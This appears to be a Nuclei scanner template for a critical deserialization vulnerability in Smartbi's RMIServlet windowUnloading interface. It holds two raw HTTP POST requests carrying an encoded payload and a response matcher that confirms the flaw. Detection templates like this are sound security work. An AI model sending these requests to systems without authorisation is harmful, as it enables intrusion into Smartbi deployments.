id: smartbi-windowunloading-deserialization

info:
  name: smartbi - Deserialization vulnerability in the windowunloading interface
  author: unknown
  severity: critical
  description: |
    Smartbi Deserialization vulnerability in the windowunloading interface.
  reference:
    - https://stack.chaitin.com/techblog/detail?id=122
  tags: smartbi

http:
  - raw:
      - |
        POST /vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 51

        className=UserService&methodName=isLogged&params=[]
      - |
        POST /smartbi/vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 51

        className=UserService&methodName=isLogged&params=[]
    matchers:
      - type: word
        words:
          - 'H~CxOm~'
        part: body